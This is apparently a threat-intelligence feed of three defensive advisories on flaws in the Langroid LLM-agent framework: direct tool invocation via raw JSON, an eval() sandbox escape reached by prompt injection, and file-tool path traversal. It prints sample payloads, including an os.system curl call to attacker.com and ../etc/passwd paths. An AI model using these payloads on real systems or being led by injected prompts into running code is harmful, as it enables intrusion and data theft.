{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/langroid/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["langroid (\u003c= 0.65.2)"],"_cs_severities":["high"],"_cs_tags":["langroid","vulnerability","rce","logic-error","python"],"_cs_type":"advisory","_cs_vendors":["Langroid"],"content_html":"\u003cp\u003eA critical logic flaw (CVE-2026-54771) has been identified in Langroid applications, affecting versions up to and including 0.65.2. This vulnerability allows untrusted users interacting with a chat interface to directly invoke internal application tools by supplying raw JSON payloads. The \u003ccode\u003ehandle_message()\u003c/code\u003e function within the \u003ccode\u003eChatAgent\u003c/code\u003e lacks proper sender verification, permitting tools registered with \u003ccode\u003euse=False, handle=True\u003c/code\u003e to be executed, which developers might mistakenly believe are protected from direct user invocation. This bypass of intended security controls can lead to unauthorized actions such as file system manipulation, database command execution, or control over internal orchestration tools, posing a significant risk of remote code execution or sensitive data compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker, as an untrusted user, interacts with a vulnerable Langroid chat application.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious chat message containing a raw JSON payload designed to invoke a specific internal tool, for example, \u003ccode\u003e{\u0026quot;request\u0026quot;:\u0026quot;secret_tool\u0026quot;,\u0026quot;value\u0026quot;:\u0026quot;pwned\u0026quot;}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Langroid \u003ccode\u003eChatAgent\u003c/code\u003e receives the user's message as input.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eagent.handle_message()\u003c/code\u003e function is called to process the user's input.\u003c/li\u003e\n\u003cli\u003eInside \u003ccode\u003ehandle_message()\u003c/code\u003e, the \u003ccode\u003eget_tool_messages()\u003c/code\u003e method parses the raw JSON from the user message, identifying it as a valid \u003ccode\u003eToolMessage\u003c/code\u003e invocation.\u003c/li\u003e\n\u003cli\u003eDespite the tool (e.g., \u003ccode\u003eSecretTool\u003c/code\u003e) being configured with \u003ccode\u003euse=False, handle=True\u003c/code\u003e, indicating it should not be directly generated by the LLM or exposed to end-users, its \u003ccode\u003ehandle()\u003c/code\u003e method is directly executed.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehandle()\u003c/code\u003e method performs its intended action, which, depending on the tool, could include reading/writing files, executing database queries, or interacting with internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker successfully bypasses security mechanisms to achieve unauthorized execution of internal tools, potentially leading to remote code execution or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe impact of CVE-2026-54771 can be severe, leading to significant compromise of affected systems. Depending on the specific internal tools enabled within the Langroid application, attackers could achieve capabilities such as arbitrary file read and write, direct execution of database queries, or unauthorized access to and manipulation of internal orchestration systems. This could result in sensitive data exfiltration, system defacement, denial of service, or full remote code execution, undermining the integrity, confidentiality, and availability of the application and underlying infrastructure. Developers may have registered these tools with the belief that \u003ccode\u003euse=False\u003c/code\u003e provides sufficient protection, making this vulnerability particularly insidious.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately patch Langroid applications to a version greater than 0.65.2 to address CVE-2026-54771.\u003c/li\u003e\n\u003cli\u003eReview all \u003ccode\u003eenable_message\u003c/code\u003e configurations within your Langroid applications, especially for sensitive tools, to ensure that only trusted entities can invoke them.\u003c/li\u003e\n\u003cli\u003eImplement robust input validation and sanitization at the application boundary for all user-supplied chat inputs to prevent raw JSON tool payloads from reaching the \u003ccode\u003ehandle_message()\u003c/code\u003e function.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-06T20:45:48Z","date_published":"2026-07-06T20:45:48Z","id":"https://feed.craftedsignal.io/briefs/2026-07-langroid-tool-invocation-bypass/","summary":"A high-severity vulnerability, CVE-2026-54771, in Langroid applications allows untrusted users to directly invoke internal tools via raw JSON payloads, even when these tools are configured not to be used by the LLM, enabling malicious actors to bypass security controls and execute sensitive operations like file read/write, database queries, or access to internal orchestration tools.","title":"Langroid Tool Invocation Bypass via Unverified User Messages (CVE-2026-54771)","url":"https://feed.craftedsignal.io/briefs/2026-07-langroid-tool-invocation-bypass/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Langroid (\u003c= 0.65.1)"],"_cs_severities":["critical"],"_cs_tags":["rce","sandbox-escape","llm","python","supply-chain"],"_cs_type":"advisory","_cs_vendors":["Langroid"],"content_html":"\u003cp\u003eAttackers can exploit a critical sandbox escape vulnerability, CVE-2026-54769, in the Langroid framework (versions \u0026lt;= 0.65.1) to achieve unauthenticated Remote Code Execution (RCE). This flaw specifically affects the \u003ccode\u003eTableChatAgent\u003c/code\u003e and \u003ccode\u003eVectorStore\u003c/code\u003e components when configured with \u003ccode\u003efull_eval=True\u003c/code\u003e. The vulnerability stems from an incomplete mitigation in Python's \u003ccode\u003eeval()\u003c/code\u003e function, where the \u003ccode\u003e__builtins__\u003c/code\u003e dictionary is not explicitly scrubbed from \u003ccode\u003eglobals\u003c/code\u003e, despite attempts to set \u003ccode\u003elocals\u003c/code\u003e to an empty dictionary. This oversight allows attackers to use prompt injection to force the underlying Large Language Model (LLM) to generate tool calls that include \u003ccode\u003e__import__('os').system()\u003c/code\u003e commands, which are then executed by the vulnerable \u003ccode\u003eeval()\u003c/code\u003e function in \u003ccode\u003elangroid/agent/special/table_chat_agent.py\u003c/code\u003e or \u003ccode\u003elangroid/vector_store/base.py\u003c/code\u003e. This bypass permits arbitrary system command execution, posing a significant risk for data exfiltration, unauthorized database access, or full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious prompt containing a tool call with an \u003ccode\u003eexpression\u003c/code\u003e field set to a Python \u003ccode\u003eos.system()\u003c/code\u003e command (e.g., \u003ccode\u003e__import__('os').system('curl http://attacker.com/pwned')\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker submits this crafted prompt to a Langroid application instance running a \u003ccode\u003eTableChatAgent\u003c/code\u003e or \u003ccode\u003eVectorStore\u003c/code\u003e configured with \u003ccode\u003efull_eval=True\u003c/code\u003e (e.g., Langroid version \u0026lt;= 0.65.1).\u003c/li\u003e\n\u003cli\u003eThe application's underlying Large Language Model (LLM) processes the malicious prompt and, as instructed, generates a tool message containing the attacker-controlled Python \u003ccode\u003eexpression\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Langroid agent's \u003ccode\u003eeval()\u003c/code\u003e function (specifically within \u003ccode\u003etable_chat_agent.py\u003c/code\u003e or \u003ccode\u003ebase.py\u003c/code\u003e) attempts to execute this \u003ccode\u003eexpression\u003c/code\u003e using \u003ccode\u003eeval(code, vars, {})\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to an incomplete sandboxing implementation, where \u003ccode\u003e__builtins__\u003c/code\u003e are implicitly available via \u003ccode\u003eglobals\u003c/code\u003e despite an empty \u003ccode\u003elocals\u003c/code\u003e dictionary, the \u003ccode\u003e__import__('os').system()\u003c/code\u003e call within the \u003ccode\u003eexpression\u003c/code\u003e is successfully resolved and executed.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eos.system()\u003c/code\u003e function invokes a new process on the host system to execute the embedded command (e.g., \u003ccode\u003ecurl\u003c/code\u003e for C2 communication or \u003ccode\u003etouch\u003c/code\u003e for arbitrary file creation).\u003c/li\u003e\n\u003cli\u003eThis unauthenticated command execution achieves Remote Code Execution (RCE), allowing the attacker to interact with the host system's operating system environment.\u003c/li\u003e\n\u003cli\u003eThe RCE enables further actions such as unauthorized data exfiltration, privilege escalation, or full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for a complete bypass of the application's intended security boundaries, directly enabling unauthenticated Remote Code Execution. The observed consequences include unauthorized database accesses, data exfiltration, or total system compromise, depending on the privileges of the user environment hosting the vulnerable Langroid agent process. Successful exploitation can lead to significant data breaches, loss of intellectual property, and extensive damage to the affected system and organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch Langroid to a version greater than 0.65.1 to mitigate CVE-2026-54769.\u003c/li\u003e\n\u003cli\u003eBlock traffic to \u003ccode\u003eattacker.com\u003c/code\u003e at your network perimeter using the IOC provided in this brief.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to detect suspicious process creation activities originating from Python processes.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging (Event ID 1) on Windows or audit logging for process creation on Linux systems to ensure telemetry for the provided rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-06T20:44:54Z","date_published":"2026-07-06T20:44:54Z","id":"https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/","summary":"Langroid is vulnerable to a critical Remote Code Execution (RCE) in its `TableChatAgent` and `VectorStore` components when `full_eval=True` due to CVE-2026-54769; the `eval()` function fails to properly scrub `__builtins__` from `globals`, allowing attackers to inject `__import__('os').system()` calls via crafted prompt payloads, leading to unauthenticated RCE, unauthorized data access, or system compromise on the host running the Langroid agent.","title":"Langroid Sandbox Escape via Incomplete eval() Mitigation","url":"https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["langroid (\u003c= 0.63.0)"],"_cs_severities":["high"],"_cs_tags":["path-traversal","python-library","vulnerability","llm-agent"],"_cs_type":"advisory","_cs_vendors":["Langroid"],"content_html":"\u003cp\u003eA significant path traversal vulnerability, tracked as CVE-2026-50181, has been identified in Langroid's \u003ccode\u003eReadFileTool\u003c/code\u003e and \u003ccode\u003eWriteFileTool\u003c/code\u003e components, affecting all versions up to and including 0.63.0. The vulnerability stems from the tools' failure to properly validate and enforce path boundaries after changing the process working directory to a \u003ccode\u003ecurr_dir\u003c/code\u003e (current directory). While the tools intend to restrict file operations to this \u003ccode\u003ecurr_dir\u003c/code\u003e, they do not resolve the user-supplied \u003ccode\u003efile_path\u003c/code\u003e to ensure it remains within this boundary. This oversight allows an attacker to use path traversal sequences, such as \u003ccode\u003e../\u003c/code\u003e, within the \u003ccode\u003efile_path\u003c/code\u003e argument to access files located outside the intended \u003ccode\u003ecurr_dir\u003c/code\u003e. The impact is particularly critical for applications that expose these file tools to user-controlled input, Large Language Model (LLM) agents, or delegated coding/documentation agents, as it can lead to unauthorized reading of sensitive files (e.g., secrets, configuration files) or modification of arbitrary files, compromising data confidentiality and integrity. The issue is present in \u003ccode\u003elangroid/agent/tools/file_tools.py\u003c/code\u003e and \u003ccode\u003elangroid/utils/system.py\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eIdentify Vulnerable Application:\u003c/strong\u003e An attacker identifies an application that integrates Langroid and exposes its \u003ccode\u003eReadFileTool\u003c/code\u003e or \u003ccode\u003eWriteFileTool\u003c/code\u003e in a way that allows user-controlled input to influence the \u003ccode\u003efile_path\u003c/code\u003e argument (e.g., via an LLM agent interface or a user-facing API).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCraft Malicious Path:\u003c/strong\u003e The attacker crafts a \u003ccode\u003efile_path\u003c/code\u003e argument containing path traversal sequences, such as \u003ccode\u003e../\u003c/code\u003e, to reference a file outside the intended sandbox or working directory (e.g., \u003ccode\u003e../etc/passwd\u003c/code\u003e for reading, or \u003ccode\u003e../malicious_script.sh\u003c/code\u003e for writing).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInvoke Vulnerable Tool:\u003c/strong\u003e The attacker sends the crafted \u003ccode\u003efile_path\u003c/code\u003e as input to the application, which then passes it directly to an instance of \u003ccode\u003eReadFileTool\u003c/code\u003e or \u003ccode\u003eWriteFileTool\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDirectory Change (Internal):\u003c/strong\u003e Internally, the Langroid tool changes the process's current working directory to the configured \u003ccode\u003ecurr_dir\u003c/code\u003e (e.g., \u003ccode\u003e/var/app/sandbox/\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnvalidated Path Resolution:\u003c/strong\u003e The tool then proceeds to open or create the file using the provided \u003ccode\u003efile_path\u003c/code\u003e argument. Due to the lack of proper validation, the \u003ccode\u003e../\u003c/code\u003e sequences are honored, causing the path to resolve outside the \u003ccode\u003ecurr_dir\u003c/code\u003e (e.g., \u003ccode\u003e/var/etc/passwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecute Unauthorized File Operation:\u003c/strong\u003e The Langroid tool performs the requested operation (read or write) on the arbitrarily resolved file path outside the intended boundary.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInformation Disclosure / Data Modification:\u003c/strong\u003e If \u003ccode\u003eReadFileTool\u003c/code\u003e was used, the contents of the sensitive file are disclosed to the attacker. If \u003ccode\u003eWriteFileTool\u003c/code\u003e was used, the attacker can modify or create arbitrary files, potentially leading to further compromise, persistence, or data integrity violations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability can severely impact applications that enable Langroid's file tools and rely on the \u003ccode\u003ecurr_dir\u003c/code\u003e parameter to establish a secure sandbox, project, or workspace boundary. If exploited, an attacker can read files outside the intended workspace, leading to the exposure of sensitive local secrets, configuration files, source code, environment files, or other critical project-adjacent data. Conversely, by exploiting \u003ccode\u003eWriteFileTool\u003c/code\u003e, an attacker could modify or create arbitrary files outside the designated project directory, which could lead to code injection, defacement, or disruption of services. The severity of the impact is contingent on how the Langroid file tools are exposed and the nature of the application's file system structure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch CVE-2026-50181:\u003c/strong\u003e Upgrade the Langroid library to a version patched for CVE-2026-50181 immediately.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImplement Path Validation:\u003c/strong\u003e For applications using Langroid file tools, implement robust path validation logic before passing any user-controlled or LLM-generated \u003ccode\u003efile_path\u003c/code\u003e arguments to \u003ccode\u003eReadFileTool\u003c/code\u003e or \u003ccode\u003eWriteFileTool\u003c/code\u003e. Ensure all resolved paths remain strictly within the intended \u003ccode\u003ecurr_dir\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview \u003ccode\u003ecurr_dir\u003c/code\u003e Usage:\u003c/strong\u003e Audit all instances where \u003ccode\u003eReadFileTool\u003c/code\u003e and \u003ccode\u003eWriteFileTool\u003c/code\u003e are used, verifying that the \u003ccode\u003ecurr_dir\u003c/code\u003e is correctly configured and that no sensitive files are reachable via path traversal from this directory.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-03T12:11:45Z","date_published":"2026-07-03T12:11:45Z","id":"https://feed.craftedsignal.io/briefs/2026-07-langroid-path-traversal/","summary":"A path traversal vulnerability (CVE-2026-50181) exists in Langroid's `ReadFileTool` and `WriteFileTool` components (versions \u003c= 0.63.0), allowing an attacker to read or write arbitrary files outside the configured `curr_dir` via crafted `file_path` arguments, potentially leading to sensitive information disclosure or unauthorized file modification in applications exposing these tools to user or LLM input.","title":"Langroid File Tools Path Traversal Vulnerability (CVE-2026-50181)","url":"https://feed.craftedsignal.io/briefs/2026-07-langroid-path-traversal/"}],"language":"en","title":"CraftedSignal Threat Feed - Langroid","version":"https://jsonfeed.org/version/1.1"}